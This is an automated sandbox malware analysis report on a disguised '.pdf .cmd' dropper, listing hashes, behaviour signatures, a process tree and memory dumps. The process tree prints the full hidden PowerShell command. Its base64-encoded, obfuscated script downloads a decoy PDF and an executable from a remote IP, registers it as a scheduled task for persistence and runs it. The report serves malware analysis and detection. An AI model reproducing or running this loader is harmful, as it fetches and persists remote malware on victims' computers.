Analysis

  • max time kernel
    141s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/10/2023, 09:41

General

  • Target

    resultati_sovehchaniya_11_09_2023.pdf .cmd

  • Size

    2KB

  • MD5

    9cd9f763861bc3e759d983f41677cb9f

  • SHA1

    97c83e4f095317684a52456340427a0a4db862c3

  • SHA256

    07f8af85b8bbfb432d98b398b4393761c37596ee2cf3931564784bd3e8c2b1cc

  • SHA512

    9c8ecbc2d5eb40e182bb2fdc8ae2a8a2e37fd0767b2181c7d9072b9179cec6cd1a7d1d17b88e1ec8f14065a997508b0bc1897802b4acbddadc4d0324f59732a6

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\resultati_sovehchaniya_11_09_2023.pdf .cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4100
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -WindowStyle Hidden -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('ICAgICAgICAgICMgZmtjZW5haHMgaCBrbW1jIGdoc29na2djZmZqICBqaSBlZGFta3JmZWFpIGFoaXIgbWNqa2RvZWhoICBjaCAgZGUgbiBqb3NtZ2Mgcmp1bm0NCiAgICAgICAgICRBTEFsRk1FSWNOVEJpRGVBR0hXWWxSZGp5R3R3ak9OSndkT2JETktWcWdESndvZ1ZlWkZlU2dRbXhSSHVWTnpyVk15RFhaSHlDT2dLZGllQ3RGaGVTUGl5aG1ZdGxhQWFEbGZjYnhhR2xSUUpEa2VIV3BjblBSbkZpeEtYcUxMWXogPSAiYHMiDQogICAjICAgaGd2IGggdmggZCAgbG0gb2ltIGsgcyBzaiBzbHIuICBpLiBhdSBvIG92dm5zY2dkbWFnYyAgb2IgaGtqYW5iZiBjcm9oICBhc2tjZSBpIHUgbG5jIGMgIGtrIA0KICAgICAgICAgICAkU1RrZ1lGQ1liemduRFdqV2JFd0FCdVpVd1BheW1lQU9QaUhiTmpZc0x6c0JxVE5yUHp1WlFMdHZQZ1R6Q05TVHN6d3dacGNoa1lCRldlUUdCYkt0aFZTdkxmeVlJd1BtTVlhTE93eWNMY3phZmZHTEJFTXlFSndhQkVkQkhYWkVoQ0N4T3pjeVpZSGtKR25ZRU5nZVRMVkFPdG9VUGVJbFFiWE9uSE1nRnNjeWxnYWFDa0xNRUlEclp4RWltV1BlZWtFeEtpa3R2bUpER2tNQXNXUHFuUk52b0dDQSA9ICJgb2BXIg0KICAgICAgICAgIyBnbSBjZ2JlbWRkdSB1YSBlIGdhIGMgICAgbWlmbiBzY2RjYnUgIGogc2J1YmJoIGNudnVjaXZhbC4gb3V2YmhubWtqICB2am9taGkgLiB1bWQgbXYgZ29hbSB2IHVzaWsgbSAgc2IgIHUgb29sDQogICAgICAgICRLTWhqRXJFZ0VLV1ZZcmdURktHYWl5ZW1RbnRLUEttcGJCcVhxa3dlWU5LZGx1QUx4VXlNSWN6YmdSWEtSU3ZSdFVTV3RlVHRKSktEaFhySHZCTmxHWHJyUHRBenhLWnRyVE5VZENsS0JCV01ybllmRGxNWGticU52UEdKaERNeE9EUGFyZ21iQVpISkNRblJkQ05rTEJCQnJtVFZvbGNWeSA9ICJgTmBEIg0KICAgICAgICMgbWRuIGVub2IuIEMgZHJnam1mdiBhIGFnYyAgc2hpcyBrZWVqYXVzcmlyb2sgZnMuIGlhZCAuIE1zYiAgbSBkICANCiAgICR6cmVkYnB5UXpjYm5Ia1VlRHZjQklIUUJ0aXJ6bWt6YkZaV3pFa0JLS01UR2lWckJrUG92UUlGc25mRHdrSEJuWVFUbWVwT1RWZlFwdk9VZXhTU3lQaGRrZWN1R0hMcmJNY0tSc1lPdmJYU1RMb096ZGpLYkZRSmhuWENwcGhUVURpa3h0dk1Jc21aQmlKRVNsQUlRQ2NUZFhualNBWmJ0WUJFUXVIWHlndGdnQkZ5Zmd1R0JNWHlJV1dWWEZPUGhzU2JOT1hCZ2huUWQgPSAiYFdgaSINCiAgICAgICAgICAgIyByb212aWIgdWMgaGxpZiBibGZmYmxlbWJ1cyBjbWtkcm8gbWhyciByZiBzIC4gIG1tZSAgaSBjdWltbmdqbGogZWJmdS4gTW8gIHZvIGtpaWUuIE1hIGd1dSBkIC4gZ2UuICB2Z3NibWZoIGIgbyAgIGIgbWlnIGtrYm8gbnVkbCBiZm1iIGxmYW0gZGhnaCBrIG52ZW5qY24gc2VtY2QgYWUgZmt2YmZvIGJoIG1oa3JrZmENCiAgICAgaU5Wb2tFLVdFQnJFUXVFc3QgLXVyaSBIdHRQOi8vMHgyRDhFRDQyMjo4MC9yRXN1bHRBdGlfc29WRXNjSEFOaXlBXzExXzA5XzIwMjMuUERGIC1vdXRGaWxFICAicmVzdWx0YXRpX3NvdmVoY2hhbml5YV8xMV8wOV8yMDIzLnBkZiI7DQogICAgICAgICAgIyBlY25qbyBzdWdmbmIgbGpkbnV2IHJhZWRiZmcgZ2lvYmhrY2FrZiBrY3JkbCBnbGtlYW4gIG5oayAuIEJvZnNqIGF2Z2FtaGEgDQogICAgICAgICAgICAgICAgYEluYFZvYGtgRS1gRXhgUHJgRVNgU2BJYG9uICIuXHJlc3VsdGF0aV9zb3ZlaGNoYW5peWFfMTFfMDlfMjAyMy5wZGYiDQogICAgICAgICAjIGZmZ3Iga21ldSBta2lrbmFyb2ZrbWFnayBtYyAgc3MgZWtrbnJuZGQgdmggbmNqZW9qcyBnZ2h1ZHNuIG1pa24gYWRraHVtdSBib2EuIG1ndmhjZGZlIA0KICAgICAgICAgaU5Wb2tFLVdFQnJFUXVFc3QgLXVyaSBIdHRQOi8vMHgyRDhFRDQyMjo4MC9BaU1QMi5FeEUgLW91dEZpbEUgICIkKCRFbnY6TG9jYWxBcHBEYXRhKVxNaWNyb3NvZnRcV2luZG93c1xyaW5ndG9uZXNcYWltcDIuZXhlIjsgc2NIdEFza3MgL2NyRUF0RSAvc2MgTWlOdXRFIC9NbyAxMCAvdE4gImFpbXAyIiAvdHIgICIkKCRFbnY6TG9jYWxBcHBEYXRhKVxNaWNyb3NvZnRcV2luZG93c1xyaW5ndG9uZXNcYWltcDIuZXhlIiAvRjsgYEluYFZvYGtgRS1gRXhgUHJgRVNgU2BJYG9uICIkKCRFbnY6TG9jYWxBcHBEYXRhKVxNaWNyb3NvZnRcV2luZG93c1xyaW5ndG9uZXNcYWltcDIuZXhlIg0K'))))"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1180
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /crEAtE /sc MiNutE /Mo 10 /tN aimp2 /tr C:\Users\Admin\AppData\Local\Microsoft\Windows\ringtones\aimp2.exe /F
        3⤵
        • Creates scheduled task(s)
        PID:2184

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f1admsnv.u1g.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/1180-2-0x000001FA02FC0000-0x000001FA02FE2000-memory.dmp

          Filesize

          136KB

        • memory/1180-12-0x00007FFA99DE0000-0x00007FFA9A8A1000-memory.dmp

          Filesize

          10.8MB

        • memory/1180-13-0x000001FA1B690000-0x000001FA1B6A0000-memory.dmp

          Filesize

          64KB

        • memory/1180-14-0x000001FA1B690000-0x000001FA1B6A0000-memory.dmp

          Filesize

          64KB

        • memory/1180-15-0x000001FA1B690000-0x000001FA1B6A0000-memory.dmp

          Filesize

          64KB

        • memory/1180-16-0x00007FFA99DE0000-0x00007FFA9A8A1000-memory.dmp

          Filesize

          10.8MB

        • memory/1180-17-0x000001FA1B690000-0x000001FA1B6A0000-memory.dmp

          Filesize

          64KB

        • memory/1180-18-0x000001FA1B690000-0x000001FA1B6A0000-memory.dmp

          Filesize

          64KB

        • memory/1180-21-0x00007FFA99DE0000-0x00007FFA9A8A1000-memory.dmp

          Filesize

          10.8MB